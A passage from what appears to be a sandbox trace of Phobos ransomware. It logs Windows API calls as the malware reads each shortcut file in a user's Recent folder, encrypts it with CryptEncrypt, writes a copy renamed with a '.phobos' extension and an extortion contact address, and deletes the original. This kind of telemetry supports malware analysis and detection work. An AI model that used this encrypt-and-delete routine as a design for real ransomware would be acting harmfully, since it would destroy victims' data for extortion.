lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.215] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\nRnbeK sd.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\nrnbek sd.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.216] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.216] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.216] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xf1f, lpOverlapped=0x0) returned 1 [0201.217] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xf20, dwBufLen=0xf20 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xf20) returned 1 [0201.217] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf20, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf20, lpOverlapped=0x0) returned 1 [0201.218] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.218] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.218] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0201.218] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.218] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0201.218] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.218] CloseHandle (hObject=0x178) returned 1 [0201.218] CloseHandle (hObject=0x124) returned 1 [0201.218] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\nRnbeK sd.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\nrnbek sd.lnk")) returned 1 [0201.219] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\o4Djq-x2uVL.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\o4djq-x2uvl.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.220] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=484) returned 1 [0201.220] CloseHandle (hObject=0x124) returned 1 [0201.220] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\o4Djq-x2uVL.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\o4djq-x2uvl.lnk")) returned 0x20 [0201.220] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\o4Djq-x2uVL.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\o4djq-x2uvl.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\o4Djq-x2uVL.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\o4djq-x2uvl.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.220] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.220] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\o4Djq-x2uVL.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\o4djq-x2uvl.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.221] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.221] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.221] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1e4, lpOverlapped=0x0) returned 1 [0201.222] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1f0, dwBufLen=0x1f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1f0) returned 1 [0201.222] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1f0, lpOverlapped=0x0) returned 1 [0201.222] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.222] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.222] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0201.222] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.222] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0201.223] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.223] CloseHandle (hObject=0x124) returned 1 [0201.223] CloseHandle (hObject=0x178) returned 1 [0201.223] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\o4Djq-x2uVL.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\o4djq-x2uvl.lnk")) returned 1 [0201.224] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OaHo4q4b.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oaho4q4b.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.224] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=4889) returned 1 [0201.224] CloseHandle (hObject=0x178) returned 1 [0201.224] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OaHo4q4b.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oaho4q4b.lnk")) returned 0x20 [0201.225] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OaHo4q4b.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oaho4q4b.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OaHo4q4b.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oaho4q4b.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.225] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.225] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OaHo4q4b.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oaho4q4b.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.225] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.225] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.225] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1319, lpOverlapped=0x0) returned 1 [0201.227] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1320, dwBufLen=0x1320 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1320) returned 1 [0201.227] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1320, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1320, lpOverlapped=0x0) returned 1 [0201.228] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.228] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.228] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0201.228] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.228] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0201.228] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.228] CloseHandle (hObject=0x178) returned 1 [0201.228] CloseHandle (hObject=0x124) returned 1 [0201.228] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OaHo4q4b.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oaho4q4b.lnk")) returned 1 [0201.229] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oIYMVr7NRYrpuIA5YZt.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oiymvr7nryrpuia5yzt.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.229] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1055) returned 1 [0201.229] CloseHandle (hObject=0x124) returned 1 [0201.230] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oIYMVr7NRYrpuIA5YZt.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oiymvr7nryrpuia5yzt.lnk")) returned 0x20 [0201.230] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oIYMVr7NRYrpuIA5YZt.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oiymvr7nryrpuia5yzt.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oIYMVr7NRYrpuIA5YZt.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oiymvr7nryrpuia5yzt.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.230] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.230] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oIYMVr7NRYrpuIA5YZt.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oiymvr7nryrpuia5yzt.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.231] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.231] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.231] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x41f, lpOverlapped=0x0) returned 1 [0201.232] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x420, dwBufLen=0x420 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x420) returned 1 [0201.232] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x420, lpOverlapped=0x0) returned 1 [0201.233] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.233] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.233] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0201.233] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.233] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0201.233] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.233] CloseHandle (hObject=0x124) returned 1 [0201.233] CloseHandle (hObject=0x178) returned 1 [0201.233] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oIYMVr7NRYrpuIA5YZt.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\oiymvr7nryrpuia5yzt.lnk")) returned 1 [0201.234] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oV5O5D9wSdG_MOwsY0.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ov5o5d9wsdg_mowsy0.mkv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.235] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=619) returned 1 [0201.235] CloseHandle (hObject=0x178) returned 1 [0201.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oV5O5D9wSdG_MOwsY0.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ov5o5d9wsdg_mowsy0.mkv.lnk")) returned 0x20 [0201.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oV5O5D9wSdG_MOwsY0.mkv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ov5o5d9wsdg_mowsy0.mkv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oV5O5D9wSdG_MOwsY0.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ov5o5d9wsdg_mowsy0.mkv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.235] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.235] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oV5O5D9wSdG_MOwsY0.mkv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ov5o5d9wsdg_mowsy0.mkv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.236] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.236] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.236] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x26b, lpOverlapped=0x0) returned 1 [0201.237] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x270, dwBufLen=0x270 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x270) returned 1 [0201.237] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x270, lpOverlapped=0x0) returned 1 [0201.238] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.238] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.238] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0201.238] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.238] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0201.238] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.238] CloseHandle (hObject=0x178) returned 1 [0201.239] CloseHandle (hObject=0x124) returned 1 [0201.239] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oV5O5D9wSdG_MOwsY0.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ov5o5d9wsdg_mowsy0.mkv.lnk")) returned 1 [0201.239] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oVdUh4Ugc.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ovduh4ugc.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.240] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=574) returned 1 [0201.240] CloseHandle (hObject=0x124) returned 1 [0201.240] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oVdUh4Ugc.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ovduh4ugc.lnk")) returned 0x20 [0201.240] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oVdUh4Ugc.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ovduh4ugc.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 